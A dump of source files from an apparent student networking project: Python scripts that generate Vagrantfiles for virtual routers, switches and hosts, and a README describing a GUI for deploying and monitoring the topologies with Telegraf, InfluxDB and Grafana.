f.write(\"config.vm.define \\\"\" + Name + \"\\\" do |\" + Name + \"|\\n\")\n f.write(Name + \".vm.box = \\\"\" + Os +\"\\\"\\n\")\n f.write(Name + \".vm.hostname = \\\"\" + Name + \"\\\"\\n\")\n f.write(Name + \".vm.network \\\"private_network\\\", ip: \\\"\" + IpNoSub + \"\\\", netmask: \\\"\" + Netmask + \"\\\", virtualbox__intnet: \\\"broadcast_host_\" + Name + \"\\\", auto_config: true\\n\")\n\n #f.write(\"#.vm.provision \\\"shell\\\", inline: <<-SHELL\\n\")\n #f.write(\"#echo \\\"Installation of Lynx Text-Based Browser to access the Web-Server via terminal on \" + Name + \"\\\"\\n\")\n #f.write(\"#sudo apt-get update\\n\")\n #f.write(\"#sudo apt-get install -y lynx\\n\")\n #f.write(\"#echo \\\"Lynx-Browser is installed\\\"\\n\")\n #f.write(\"#SHELL\\n\")\n f.write(Name + '.vm.provision \"file\", source: \\\"../Dashboard_Server/telegraf.conf\\\", destination: \\\"/tmp/telegraf.conf\\\"\\n')\n f.write(Name + \".vm.provision \\\"shell\\\", run: \\\"always\\\", inline: <<-SHELL\\n\")\n f.write(\"echo \\\"Static Routig configuration Started for \" + Name + \"\\\"\\n\")\n f.write(\"sudo sysctl -w net.ipv4.ip_forward=1\\n\")\n\n f.write(\"sudo route add -net \" + IpNetServer1_1 + \" netmask \" + NetmaskServer1_1 + \" gw \" + Gateway + \" dev \" + Interface + \"\\n\")\n f.write(\"sudo route add -net \" + IpNetServer1_2 + \" netmask \" + NetmaskServer1_2 + \" gw \" + Gateway + \" dev \" + Interface + \"\\n\")\n f.write(\"sudo route add -net \" + IpNetServer2 + \" netmask \" + NetmaskServer2 + \" gw \" + Gateway + \" dev \" + Interface + \"\\n\")\n \n\n if Id == 4: \n f.write(\"sudo route add -net \" + IpNetSwitch_2 + \" netmask \" + NetmaskSwitch_2 + \" gw \" + Gateway + \" dev \" + Interface + \"\\n\")\n if Id == 5:\n f.write(\"sudo route add -net \" + IpNetSwitch_1 + \" netmask \" + NetmaskSwitch_1 + \" gw \" + Gateway + \" dev \" + Interface + \"\\n\")\n \n f.write('cd /home/vagrant\\n')\n f.write('git clone https://github.com/magnific0/wondershaper.git\\n')\n f.write('cd wondershaper\\n')\n if UplinkBandwidth > 0 or DownlinkBandwidth > 0:\n f.write('sudo ./wondershaper -a ' + Interface)\n if DownlinkBandwidth > 0:\n f.write(' -d ' + str(DownlinkBandwidth))\n if UplinkBandwidth > 0:\n f.write(' -u ' + str(UplinkBandwidth))\n f.write('\\n')\n f.write('wget https://dl.influxdata.com/telegraf/releases/telegraf_1.17.3-1_amd64.deb\\n')\n f.write('sudo dpkg -i telegraf_1.17.3-1_amd64.deb\\n')\n f.write('sudo mv /tmp/telegraf.conf /etc/telegraf/telegraf.conf\\n')\n f.write('sudo systemctl restart telegraf\\n')\n f.write('sudo systemctl enable telegraf\\n')\n f.write(CustomScript + \" \\n\") #here there is the custum script\n f.write(\"echo \\\"Configuration END\\\"\\n\")\n f.write(\"echo \\\"\" + Name + \" is ready to Use\\\"\\n\")\n f.write(\"SHELL\\n\")\n f.write(Name + \".vm.provider \\\"virtualbox\\\" do |vb|\\n\")\n f.write(\"vb.memory = \" + str(Ram) + \"\\n\")\n f.write(\"vb.cpus = \" + str(N_Cpus) + \"\\n\")\n f.write(\"end\\n\")\n f.write(\"end\\n\")\n\n\n\n\n#this function write in the vagrant file a new Router\ndef writeSwitch(f, Switch, edges, network):\n\n #extrapolate each attribute from the touples\n Id = Switch[\"id\"]\n Name = Switch[\"label\"]\n Ram = Switch[\"ram\"]\n N_Cpus = Switch[\"n_cpus\"]\n Os = Switch[\"vm_image\"]\n CustomScript = Switch[\"custom_script\"]\n\n IpA = Switch[\"network_interfaces\"][0][\"ip_address\"]\n NetmaskA = Switch[\"network_interfaces\"][0][\"netmask\"]\n InterfaceA = Switch[\"network_interfaces\"][0][\"name_interface\"]\n EdgeReferenceA = Switch[\"network_interfaces\"][0][\"edge\"]\n UplinkBandwidthA = 0\n DownlinkBandwidthA = 0\n for edge in edges:\n if EdgeReferenceA[0] == edge[\"from\"] and EdgeReferenceA[1] == edge[\"to\"]:\n UplinkBandwidthA = edge[\"bandwidth_up\"]\n DownlinkBandwidthA = edge[\"bandwidth_down\"]\n\n IpB = Switch[\"network_interfaces\"][1][\"ip_address\"]\n NetmaskB = Switch[\"network_interfaces\"][1][\"netmask\"]\n InterfaceB = Switch[\"network_interfaces\"][1][\"name_interface\"]\n EdgeReferenceB = Switch[\"network_interfaces\"][1][\"edge\"]\n UplinkBandwidthB = 0\n DownlinkBandwidthB = 0\n for edge in edges:\n if EdgeReferenceB[0] == edge[\"from\"] and EdgeReferenceB[1] == edge[\"to\"]:\n UplinkBandwidthB = edge[\"bandwidth_up\"]\n DownlinkBandwidthB = edge[\"bandwidth_down\"]\n\n IpSW = Switch[\"network_interfaces\"][2][\"ip_address\"]\n NetmaskSW = Switch[\"network_interfaces\"][2][\"netmask\"]\n InterfaceSW = Switch[\"network_interfaces\"][2][\"name_interface\"]\n EdgeReferenceSW = Switch[\"network_interfaces\"][2][\"edge\"]\n UplinkBandwidthSW = 0\n DownlinkBandwidthSW = 0\n for edge in edges:\n if EdgeReferenceSW[0] == edge[\"from\"] and EdgeReferenceSW[1] == edge[\"to\"]:\n UplinkBandwidthSW = edge[\"bandwidth_up\"]\n DownlinkBandwidthSW = edge[\"bandwidth_down\"]\n\n\n Gateway = network[0][\"network_interfaces\"][0][\"ip_address\"]\n Gateway = Gateway.split(\"/\")[0]\n\n IpServer1_2 = network[0][\"network_interfaces\"][1][\"ip_address\"]\n NetmaskServer1_2 = network[0][\"network_interfaces\"][1][\"netmask\"]\n NetworkServer1_2 = ipcalc.Network(IpServer1_2)\n IpNetServer1_2 = str(NetworkServer1_2.network())\n \"\"\"\n Ip2 = Topology[4][1][\"Network\"][0][\"Ip\"]\n Mask2 = Topology[4][1][\"Network\"][0][\"Netmask\"]\n Network2 = ipcalc.Network(Ip2)\n IpNet2 = str(Network2.network())\n \"\"\"\n\n IpServer2 = network[1][\"network_interfaces\"][0][\"ip_address\"]\n NetmaskServer2 = network[1][\"network_interfaces\"][0][\"netmask\"]\n NetworkServer2 = ipcalc.Network(IpServer2)\n IpNetServer2 = str(NetworkServer2.network())\n \"\"\"\n Ip4 = Topology[3][1][\"Network\"][1][\"Ip\"]\n Mask4 = Topology[3][1][\"Network\"][1][\"Netmask\"]\n Network4 = ipcalc.Network(Ip4)\n IpNet4 = str(Network4.network())\n \"\"\"\n\n f.write(\"config.vm.define \\\"\" + Name + \"\\\" do |\" + Name + \"|\\n\")\n f.write(Name + \".vm.box = \\\"\" + Os +\"\\\"\\n\")\n f.write(Name + \".vm.hostname = \\\"\" + Name + \"\\\"\\n\")\n f.write(Name + \".vm.network \\\"private_network\\\", virtualbox__intnet: \\\"broadcast_router-south-1\\\", auto_config: false\\n\")\n f.write(Name + \".vm.network \\\"private_network\\\", virtualbox__intnet: \\\"broadcast_host_\" + network[4][\"label\"] + \"\\\", auto_config: false\\n\")\n f.write(Name + \".vm.network \\\"private_network\\\", virtualbox__intnet: \\\"broadcast_host_\" + network[5][\"label\"] + \"\\\", auto_config: false\\n\")\n f.write(Name + '.vm.provision \"file\", source: \\\"../Dashboard_Server/telegraf.conf\\\", destination: \\\"/tmp/telegraf.conf\\\"\\n')\n f.write(Name + \".vm.provision \\\"shell\\\", inline: <<-SHELL\\n\")\n f.write(\"echo \\\"OpenVSwitch Installation is started\\\"\\n\")\n f.write(\"apt-get update\\n\")\n f.write(\"apt-get install -y tcpdump\\n\")\n f.write(\"apt-get install -y openvswitch-common openvswitch-switch apt-transport-https ca-certificates curl software-properties-common\\n\")\n f.write(\"echo \\\"OpenVSwitch Bridge Configuration Started\\\"\\n\")\n f.write(\"sudo ovs-vsctl add-br SW1\\n\")\n f.write(\"sudo ovs-vsctl add-br HA\\n\")\n f.write(\"sudo ovs-vsctl add-br HB\\n\")\n f.write(\"sudo ovs-vsctl add-port SW1 eth1\\n\")\n f.write(\"sudo ovs-vsctl add-port HA eth2\\n\")\n f.write(\"sudo ovs-vsctl add-port HB eth3\\n\")\n f.write(\"echo \\\"Bridge configuration END\\\"\\n\")\n f.write(\"SHELL\\n\")\n f.write(Name + \".vm.provision \\\"shell\\\", run: \\\"always\\\", inline: <<-SHELL\\n\")\n f.write(\"echo \\\"OpenVSwitch Ip addressing is started\\\"\\n\")\n f.write(\"sudo ifconfig SW1 \" + IpSW + \"\\n\")\n f.write(\"sudo ifconfig HA \" + IpA + \"\\n\")\n f.write(\"sudo ifconfig HB \" + IpB + \"\\n\")\n f.write(\"sudo ifconfig SW1 up\\n\")\n f.write(\"sudo ifconfig HA up\\n\")\n f.write(\"sudo ifconfig HB up\\n\")\n f.write(\"sudo ifconfig eth1 up\\n\")\n f.write(\"sudo ifconfig eth2 up\\n\")\n f.write(\"sudo ifconfig eth3 up\\n\")\n f.write(\"sudo sysctl -w net.ipv4.ip_forward=1\\n\")\n f.write(\"sudo route add -net \" + IpNetServer1_2 +\" netmask \" + NetmaskServer1_2 + \" gw \" + Gateway + \" dev \" + InterfaceSW + \"\\n\")\n f.write(\"sudo route add -net \" + IpNetServer2 +\" netmask \" + NetmaskServer2 + \" gw \" + Gateway + \" dev \" + InterfaceSW + \"\\n\")\n f.write('cd /home/vagrant\\n')\n f.write('git clone https://github.com/magnific0/wondershaper.git\\n')\n f.write('cd wondershaper\\n')\n if UplinkBandwidthA > 0 or DownlinkBandwidthA > 0:\n f.write('sudo ./wondershaper -a ' + InterfaceA)\n if DownlinkBandwidthA > 0:\n f.write(' -d ' + str(DownlinkBandwidthA))\n if UplinkBandwidthA > 0:\n f.write(' -u ' + str(UplinkBandwidthA))\n f.write('\\n')\n\n if UplinkBandwidthB > 0 or DownlinkBandwidthB > 0:\n f.write('sudo ./wondershaper -a ' + InterfaceB)\n if DownlinkBandwidthB > 0:\n f.write(' -d ' + str(DownlinkBandwidthB))\n if UplinkBandwidthB > 0:\n f.write(' -u ' + str(UplinkBandwidthB))\n f.write('\\n')\n \n if UplinkBandwidthSW > 0 or DownlinkBandwidthSW > 0:\n f.write('sudo ./wondershaper -a ' + InterfaceSW)\n if DownlinkBandwidthSW > 0:\n f.write(' -d ' + str(DownlinkBandwidthSW))\n if UplinkBandwidth3 > 0:\n f.write(' -u ' + str(UplinkBandwidthSW))\n f.write('\\n')\n f.write('wget https://dl.influxdata.com/telegraf/releases/telegraf_1.17.3-1_amd64.deb\\n')\n f.write('sudo dpkg -i telegraf_1.17.3-1_amd64.deb\\n')\n f.write('sudo mv /tmp/telegraf.conf /etc/telegraf/telegraf.conf\\n')\n f.write('sudo systemctl restart telegraf\\n')\n f.write('sudo systemctl enable telegraf\\n')\n f.write(CustomScript + \" \\n\") #here there is the custum script\n f.write(\"echo \\\"Configuration END\\\"\\n\")\n f.write(\"echo \\\"\"+ Name + \" is ready to Use\\\"\\n\")\n f.write(\"SHELL\\n\")\n f.write(Name + \".vm.provider \\\"virtualbox\\\" do |vb|\\n\")\n f.write(\"vb.memory = \" + str(Ram) + \"\\n\")\n f.write(\"vb.cpus = \" + str(N_Cpus) + \"\\n\")\n f.write(\"end\\n\")\n f.write(\"end\\n\")\n \n\n\n\ndef html_to_vagrantfile(nodes, edges):\n VagrantFile = open(\"Vagrantfile\", \"w\")\n\n BeginVagrantFile(VagrantFile)\n for node in nodes:\n if node[\"type\"] == \"Web\":\n writeServer(VagrantFile, node, edges, nodes)\n if node[\"type\"] == \"switch\":\n writeSwitch(VagrantFile, node, edges, nodes)\n if node[\"type\"] == \"host\":\n writeHost(VagrantFile, node, edges, nodes) \n VagrantFile.write('end\\n')\n VagrantFile.close()\n\n\n"
},
{
"alpha_fraction": 0.5520987510681152,
"alphanum_fraction": 0.5701234340667725,
"avg_line_length": 36.841121673583984,
"blob_id": "717fdd185699d9a1a470536f0108d3e675b69ff3",
"content_id": "e2280e28d4167e1199d59613c31fd1ad7cb27bf5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4052,
"license_type": "permissive",
"max_line_length": 120,
"num_lines": 107,
"path": "/fromHTMLtoVagrant/OldScripts/VagrantTopologyDocker.py",
"repo_name": "SuperboGiuseppe/dncs_lab2",
"src_encoding": "UTF-8",
"text": "import ipcalc\nimport yaml\n\n#this function writes the beginning of the VagrantFile\ndef BeginVagrantFile(f,Docker):\n\n Name = Docker[1][\"Name\"]\n Os = Docker[1][\"Os\"]\n CustumScript = Router[1][\"custom_script\"]\n\n f.write('## to access webserver try this in your webbrowser : (http://localhost:8081/) you will see the webpage.\\n')\n f.write('# -*- mode: ruby -*-\\n')\n f.write('# vi: set ft=ruby :\\n')\n f.write('Vagrant.configure(\"2\") do |config|\\n')\n f.write('config.vm.box = \\\"' + Os + '\\\"\\n')\n f.write('config.vm.network \"forwarded_port\", guest: 80, host: 8081\\n')\n f.write('config.vm.provision \"docker\" do |doc|\\n')\n f.write('doc.pull_images \"nginx\"\\n')\n f.write('doc.pull_images \"mysql\"\\n')\n f.write('doc.run \"mysql\"\\n')\n f.write('doc.run \"nginx\", args: \"-p 80:80\"\\n')\n f.write(Name + '.vm.provision \"shell\", run: \"always\", inline: <<-SHELL\\n')\n f.write(CustumScript + \" \\n\") #here there is the custum script\n f.write('end\\n')\n f.write('end\\n')\n\ndocker1 = (1,{\n \"Id\" : 1,\n \"Name\":\"docker1\",\n \"Os\": \"ubuntu/xenial64\",\n \"custom_script\":\"echo 'THIS IS CUSTUM SCRIPT'\"\n})\n\nMyNet = [docker1]\n\ndef find_between( s, first, last ):\n try:\n start = s.index( first ) + len( first )\n end = s.index( last, start )\n return s[start:end]\n except ValueError:\n return \"\"\n\ndef remap(newList):\n print(\"-------------------\")\n\n for item in newList:\n print(\"Looking at device \" + str(item))\n print(\"the TYPE is \" + item[\"type\"])\n if item[\"type\"] == \"router\" : \n\n for device in MyNet:\n if device[1][\"Id\"] is item[\"id\"]:\n print(\"remap of device \" + str(device[1][\"Id\"]) + \" to device \" + str(item[\"id\"]))\n device[1][\"Name\"] = item[\"label\"]\n device[1][\"Ram\"] = item[\"ram\"]\n device[1][\"Os\"] = item[\"vm_image\"]\n\n device[1][\"Network\"][0][\"Ip\"] = item[\"network_interfaces\"][0][\"ip_address\"]\n device[1][\"Network\"][0][\"Netmask\"] = item[\"network_interfaces\"][0][\"netmask\"]\n device[1][\"Network\"][0][\"Interface\"] = item[\"network_interfaces\"][0][\"name_interface\"]\n\n device[1][\"Network\"][1][\"Ip\"] = item[\"network_interfaces\"][1][\"ip_address\"]\n device[1][\"Network\"][1][\"Netmask\"] = item[\"network_interfaces\"][1][\"netmask\"]\n device[1][\"Network\"][1][\"Interface\"] = item[\"network_interfaces\"][1][\"name_interface\"]\n\n device[1][\"Network\"][2][\"Ip\"] = item[\"network_interfaces\"][2][\"ip_address\"]\n device[1][\"Network\"][2][\"Netmask\"] = item[\"network_interfaces\"][2][\"netmask\"]\n device[1][\"Network\"][2][\"Interface\"] = item[\"network_interfaces\"][2][\"name_interface\"] \n\n for item in newList:\n if item[\"type\"] == \"host\" : \n\n for device in MyNet:\n if device[1][\"Id\"] is item[\"id\"]:\n print(\"remap of device \" + str(device[1][\"Id\"]) + \" to device \" + str(item[\"id\"]))\n device[1][\"Name\"] = item[\"label\"]\n device[1][\"Ram\"] = item[\"ram\"]\n device[1][\"Os\"] = item[\"vm_image\"]\n\n device[1][\"Network\"][0][\"Ip\"] = item[\"network_interfaces\"][0][\"ip_address\"]\n device[1][\"Network\"][0][\"Netmask\"] = item[\"network_interfaces\"][0][\"netmask\"]\n device[1][\"Network\"][0][\"Interface\"] = item[\"network_interfaces\"][0][\"name_interface\"]\n\n return MyNet\n\ndef html_to_vagrantfile(Network):\n VagrantFile = open(\"VagrantfileDOCKER\", \"w\")\n\n #read the data structure from input\n #Network = G.nodes.data():\n #file = codecs.open(\"NetworkGraphs/Template/OSPF_Routing_Template.html\", \"r\", \"utf-8\")\n #html = file.read()\n\n #if \"nodes = new vis.DataSet(\" in html:\n # listOfDevice = find_between(html, \"nodes = new vis.DataSet(\" , \")\")\n # print(listOfDevice)\n # listOfDevice = yaml.load(listOfDevice) \n\n #newNet = remap(listOfDevice)\n\n #N.B per Luca, Network è già la lista dei nodi che puoi esplorare\n #Network = MyNet #RICAMBIALA CON NEWNET\n\n BeginVagrantFile(VagrantFile,docker1)\n\n VagrantFile.close()\n\n"
},
{
"alpha_fraction": 0.7415792346000671,
"alphanum_fraction": 0.7468940019607544,
"avg_line_length": 47.78114318847656,
"blob_id": "9b85767b4e2a5c520e3212e66170fa9bfa4f6226",
"content_id": "11f2d49c344436bb3a29972b9bb8321724ca12bd",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 14491,
"license_type": "permissive",
"max_line_length": 1081,
"num_lines": 297,
"path": "/README.md",
"repo_name": "SuperboGiuseppe/dncs_lab2",
"src_encoding": "UTF-8",
"text": "<!--\n*** Thanks for checking out the Best-README-Template. If you have a suggestion\n*** that would make this better, please fork the repo and create a pull request\n*** or simply open an issue with the tag \"enhancement\".\n*** Thanks again! Now go create something AMAZING! :D\n-->\n\n\n\n<!-- PROJECT SHIELDS -->\n<!--\n*** I'm using markdown \"reference style\" links for readability.\n*** Reference links are enclosed in brackets [ ] instead of parentheses ( ).\n*** See the bottom of this document for the declaration of the reference variables\n*** for contributors-url, forks-url, etc. This is an optional, concise syntax you may use.\n*** https://www.markdownguide.org/basic-syntax/#reference-style-links\n-->\n[![Contributors][contributors-shield]][contributors-url]\n[![Forks][forks-shield]][forks-url]\n[![Stargazers][stars-shield]][stars-url]\n[![Issues][issues-shield]][issues-url]\n[![MIT License][license-shield]][license-url]\n\n\n\n<!-- PROJECT LOGO -->\n<br />\n<p align=\"center\">\n <a href=\"https://github.com/SuperboGiuseppe/dncs_lab2\">\n <img src=\"Images/network.png\" alt=\"Logo\" width=\"80\" height=\"80\">\n </a>\n\n <h3 align=\"center\">AUTOMATING THE DEPLOYMENT OF NETWORK SETUPS USING VAGRANT</h3>\n\n <p align=\"center\">\n Design of Networks and communication systems - Project A.Y. 2020-21 University of Trento, Italy\n <br />\n <a href=\"https://github.com/SuperboGiuseppe/dncs_lab2\"><strong>Explore the docs »</strong></a>\n <br />\n <br />\n <a href=\"https://github.com/SuperboGiuseppe/dncs_lab2/blob/main/README.md\">View Demo</a>\n ·\n <a href=\"https://github.com/SuperboGiuseppe/dncs_lab2/issues\">Report Bug</a>\n ·\n <a href=\"https://github.com/SuperboGiuseppe/dncs_lab2/issues\">Request Feature</a>\n </p>\n</p>\n\n\n\n<!-- TABLE OF CONTENTS -->\n<details open=\"open\">\n <summary>Table of Contents</summary>\n <ol>\n <li>\n <a href=\"#about-the-project\">About The Project</a>\n <ul>\n <li><a href=\"#List-of-features\">List of features</a></li>\n <li><a href=\"#built-with\">Built With</a></li>\n <li><a href=\"#Dashboard\">Dashboard</a></li>\n </ul>\n </li>\n <li>\n <a href=\"#getting-started\">Getting Started</a>\n <ul>\n <li><a href=\"#prerequisites\">Prerequisites</a></li>\n <li><a href=\"#installation-Requirements\">Installation Requirements</a></li>\n </ul>\n </li>\n <li><a href=\"#usage\">Usage</a></li>\n <li><a href=\"#roadmap\">Roadmap</a></li>\n <li><a href=\"#contributing\">Contributing</a></li>\n <li><a href=\"#license\">License</a></li>\n <li><a href=\"#contact\">Contact</a></li>\n </ol>\n</details>\n\n\n\n<!-- ABOUT THE PROJECT -->\n## About The Project\n\n![Main window screenshot][product-screenshot]\n\nThis project is based on a graphical user interface (GUI) that provides a platform for the developer to create a fully automated virtual network environment for testing and development. The users can easily customize and design a virtual network environment according to their needs. With the help of this platform, a user can create and configure different virtual machines acting as a server, router, switches, and hosts or specialized hosts. Custom topologies can be designed from scratch or starting from predefined templates. Once the network is deployed and configured, the user can access or monitor each virtual machine.\n\n### Dashboard\n\nA monitoring dashboard is configured and deployed in order to provide users an extended view of the single virtual machine status. The configuration of the dashboard is based on a specific data flux which is commonly adopted in network configurations:\n- **Telegraf** collects data from the target node and sends it to a specific end-point via http requests;\n- **Influxdb** receives the data from the target node and stores it in an optimal way;\n- **Grafana** plots and prompts the data stored in influxdb through a custom dashboard.\n\n![Dashboard data flux scheme][dashboard-flux]\n![Dashboard example CPU][dashboard-cpu]\n![Dashboard example network][dashboard-network]\n\nThe configuration of this flux is automated as, everytime a network is deployed, an additional vagrant environment is deployed in \"Dashboard_server\". The machine where grafana server is executed is based on the following Vagrant Box: [superbogiuseppe/grafana_server](https://app.vagrantup.com/superbogiuseppe/boxes/grafana_server).\n\nCredentials for the dashboard:\n - Username: admin\n - Password: dashboard\n\n### List of features\nAvailable features:\n- Provide Graphical User Interface for creating Virtual environments;\n- provide a modern monitoring architecture to monitor running virtual environments;\n- Provide the functionality to use different Linux machine's flavors for different purposes;\n- Provide the option to set a specific uplink or downlink speed limit;\n- Provide the option to control your network in real-time;\n- Provide the option to write and debug the vagrant scripts;\n- Provide the option of customizing the network topologies;\n- Provide the option of using different Docker images.\n\n### Built With\n\nA network is composed of a set of computing devices connected to each other. Likewise, a graph is a mathematical structure composed of a set of nodes connected among each other via edges. For this reason, the network management core of this project is based on a really light python library called pyvis, which is based on javascript. This library, makes it possible to have a very clear network visualization and all the details of each node collected in the entity itself. In order to monitor the network statistics, we have used (Telegraf, InfluxBD, and Grafana). These technologies are open source and easy to use and implement. They also provide an open platform for beautiful analytics and monitoring (a dashboard for displaying data) from many sources, particularly time-series data. On the backend, we have used the vagrant development environment by HashiCorp along with the VirtualBox. Vagrant is a simple and powerful tool that provides a platform where we can easily integrate our existing configuration management toolings like Ansible, Chef, Docker, Puppet, or Salt. \n\n* [Pyvis](https://pyvis.readthedocs.io/en/latest/tutorial.html)\n* [Vagrant](https://www.vagrantup.com/)\n* [QtPy](https://pypi.org/project/PyQt5/)\n* [Vagrant Boxes](https://app.vagrantup.com/boxes/search)\n* [Python](https://www.python.org/)\n* [VirtualBox](https://www.virtualbox.org/)\n* [Html](https://en.wikipedia.org/wiki/HTML#:~:text=Hypertext%20Markup%20Language%20(HTML)%20is,scripting%20languages%20such%20as%20JavaScript.)\n* [Docker](https://www.docker.com/)\n* [OpenSwitch](https://www.openswitch.net/)\n* [Quagga Routing](https://www.quagga.net/)\n* [Wondershaper](https://github.com/magnific0/wondershaper)\n* [Grafana](https://grafana.com/)\n* [Influxdata](https://www.influxdata.com/products/influxdb-overview/)\n* [Telegraf](https://www.influxdata.com/time-series-platform/telegraf/)\n\nThese tools have not been used in the default topologies that we have created. But users can create and configure custom topologies using these tools easily.\n* [Ansible](https://www.ansible.com/)\n* [Puppet](https://puppet.com/)\n* [Salt](https://saltproject.io/automating-network-operations-with-salt-2019-2-0/)\n\n<!-- GETTING STARTED -->\n## Getting Started\n\nIn order to get benefit from this environment, you must have some basic knowledge of networking, python, vagrant configuration, etc.\n\n### Prerequisites\n\nSome prerequisites have to be done before using this environment. It's based on your operating system. You can use Windows, Mac, Linux, but you have to see the procedure of installation according to your operating system. We have used the entire windows operating system to develop this environment. But anyone can install it on the other operating system.\n\n<!--\n* npm\n ```sh\n npm install npm@latest -g\n ``\n-->\n\n### Installation Requirements\n\n1. [Python 3.9.0](https://www.python.org/)\n - [pyvis](https://pyvis.readthedocs.io/en/latest/install.html#install-with-pip) (pip install pyvis)\n - [PyQt5](https://pypi.org/project/PyQt5/) (pip install pyqt5)\n - [PyYAML](https://pypi.org/project/PyYAML/) (pip install pyyaml)\n - [ipcalc](https://pypi.org/project/ipcalc/) (pip install ipcalc)\n2. 10GB disk storage\n3. Windows/Linux/Mac\n4. [VirtualBox](https://www.virtualbox.org/)\n5. [Vagrant](https://www.vagrantup.com/)\n6. Internet\n7. Clone the repo\n ```sh\n git clone https://github.com/SuperboGiuseppe/dncs_lab2.git\n ```\n<!-- USAGE EXAMPLES -->\n## Usage\n\nThis project is only used to provide the user to test their environments by providing the same operating system, packages, and configurations, all while giving users the flexibility to use their favorite editor, IDE, and browsers. In order to launch the design tool, execute the following command in the main directory of the project:\n ```sh\n python ./main.py\n ```\n\n### Create a new network\nBy pressing \"New network\", a wizard will be prompted. Here it is possible to create a network from scratch (**Not currently implemented**) or to create a network from a template. Once the template has been selected, the same topology will be available on the main canvas and ready to be configured/modified/deployed.\n\n### Save network\nBy pressing \"Save network\", it is possible to save the network in a html format (Pyvis compatible format) along with its configuration.\n\n### Open network\nBy pressing \"Open network\", it is possible to import an already configured/designed network. It is necessary that the file is compatible with the pyvis library (HTML format).\n\n### Adding new devices (**Not currently implemented**)\nBy pressing the buttons \"Router\", \"Switch\", \"Host\" or \"Other\", it is possible to add a new device to the network.\n\n### Edit configuration\nBy pressing \"Edit configuration\" it is possible to edit the configuration of each device of the network:\n - Virtual machine characteristics (CPUs, RAM, VM Image, device name);\n - Network configuration of each interface (IP, Netmask, interface name);\n - Custom script to be provisioned during the deployment.\n\n### Edge configuration\nBy pressing \"Edge configuration\", it is possible to edit uplink and downlink speed limits of each edge.\n\n### Deploy network\nBy pressing \"Deploy network\", the network will be deployed via Vagrant. It is recommended to have the debug console active in order to retrieve any deployment error or warning.\n\n### Control dashboard\nOnce the network is deployed successfully, by pressing \"Control dashboard\", it is possible to navigate in the grafana interface in order to visualize any real-time statistic of each machine.\n\n### SSH Connection\nBy pressing \"SSH Connection\", it is possible to establish an SSH connection with a specific node of the deployed network: a terminal will be prompted once the connection has been established.\n\n### Debug console\nBy pressing \"Debug console\", it is possible to show/hide the debug console which is useful during the deployment phase of the network.\n\n### Turn on/off VMs\nBy pressing \"Turn on/of VMs\", it is possible to stop all the devices of the network without destroying them.\n\n### Destroy network\nBy pressing \"Destroy network\", it is possible to destroy the deployed network along with the dashboard server.\n\n\n<!-- _For more examples, please refer to the [Documentation](https://www.vagrantup.com/docs)_ >\n\n\n\n<!-- ROADMAP -->\n## Roadmap\nThe road map we have:\n- On the Frontend python library called pyvis used.\n- On the backend vagrant scripts used to create the virtual machines.\n- On the backend, we have created a mechanism that converts the Vagrant scripts into the HTML formats in order to be compatible with the pyvis.\n- A virtual machine created separately to manage the dashboard that runs along automatically with vagrant topologies. \n\n\n<!-- CONTRIBUTING -->\n## Contributing\n\nContributions are what make the open source community such an amazing place to be learn, inspire, and create. Any contributions you make are **greatly appreciated**.\n\n1. Fork the Project\n2. Create your Feature Branch (`git checkout -b`)\n3. Commit your Changes (`git commit -m 'Add some Feature'`)\n4. Push to the Branch (`git push origin Feature`)\n5. Open a Pull Request\n\n\n<!-- LICENSE -->\n## License\n\nDistributed under the MIT License. See `LICENSE` for more information.\n\n\n\n<!-- CONTACT -->\n## Contact\n\nProject coordinator\n- [Professor Fabrizio Granelli](https://github.com/fabrizio-granelli)\n\nStudents\n- [Giuseppe Superbo](https://github.com/SuperboGiuseppe)\n- [Luca Staboli](https://github.com/LucaStabo)\n- [Muhammad Uzair](https://github.com/uzairali37)\n\nProject Link: [AUTOMATING THE DEPLOYMENT OF NETWORK SETUPS USING VAGRANT](https://github.com/SuperboGiuseppe/dncs_lab2)\n\n\n\n<!-- ACKNOWLEDGEMENTS\n## Acknowledgements\n* [GitHub Emoji Cheat Sheet](https://www.webpagefx.com/tools/emoji-cheat-sheet)\n* [Img Shields](https://shields.io)\n* [Choose an Open Source License](https://choosealicense.com)\n* [GitHub Pages](https://pages.github.com)\n* [Animate.css](https://daneden.github.io/animate.css)\n* [Loaders.css](https://connoratherton.com/loaders)\n* [Slick Carousel](https://kenwheeler.github.io/slick)\n* [Smooth Scroll](https://github.com/cferdinandi/smooth-scroll)\n* [Sticky Kit](http://leafo.net/sticky-kit)\n* [JVectorMap](http://jvectormap.com)\n* [Font Awesome](https://fontawesome.com)\n -->\n\n\n<!-- MARKDOWN LINKS & IMAGES -->\n<!-- https://www.markdownguide.org/basic-syntax/#reference-style-links -->\n[contributors-shield]: https://img.shields.io/github/contributors/SuperboGiuseppe/dncs_lab2.svg?style=for-the-badge\n[contributors-url]: https://github.com/SuperboGiuseppe/dncs_lab2/graphs/contributors\n[forks-shield]: https://img.shields.io/github/forks/SuperboGiuseppe/dncs_lab2.svg?style=for-the-badge\n[forks-url]: https://github.com/uzairali37/dncs_lab2\n[stars-shield]: https://img.shields.io/github/stars/SuperboGiuseppe/dncs_lab2.svg?style=for-the-badge\n[stars-url]: https://github.com/SuperboGiuseppe/dncs_lab2/stargazers\n[issues-shield]: https://img.shields.io/github/issues/SuperboGiuseppe/dncs_lab2.svg?style=for-the-badge\n[issues-url]: https://github.com/SuperboGiuseppe/dncs_lab2/issues\n[license-shield]: https://img.shields.io/github/license/othneildrew/Best-README-Template.svg?style=for-the-badge\n[license-url]: https://github.com/othneildrew/Best-README-Template/blob/master/LICENSE.txt\n[product-screenshot]: Images/Documentation/screenshot.png\n[dashboard-flux]: Images/Documentation/dashboard_flux.png\n[dashboard-cpu]: Images/Documentation/Dashboard_2.png\n[dashboard-network]: Images/Documentation/Dashboard_1.png\n"
},
{
"alpha_fraction": 0.555793285369873,
"alphanum_fraction": 0.5907555222511292,
"avg_line_length": 37.52277755737305,
"blob_id": "dd4d0e774527c82b63ed32851d926886eeb0046b",
"content_id": "35ad33be6a1e6225ef205d621b1ec1a269636b44",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 17764,
"license_type": "permissive",
"max_line_length": 239,
"num_lines": 461,
"path": "/fromHTMLtoVagrant/VagrantTopologyOSPF.py",
"repo_name": "SuperboGiuseppe/dncs_lab2",
"src_encoding": "UTF-8",
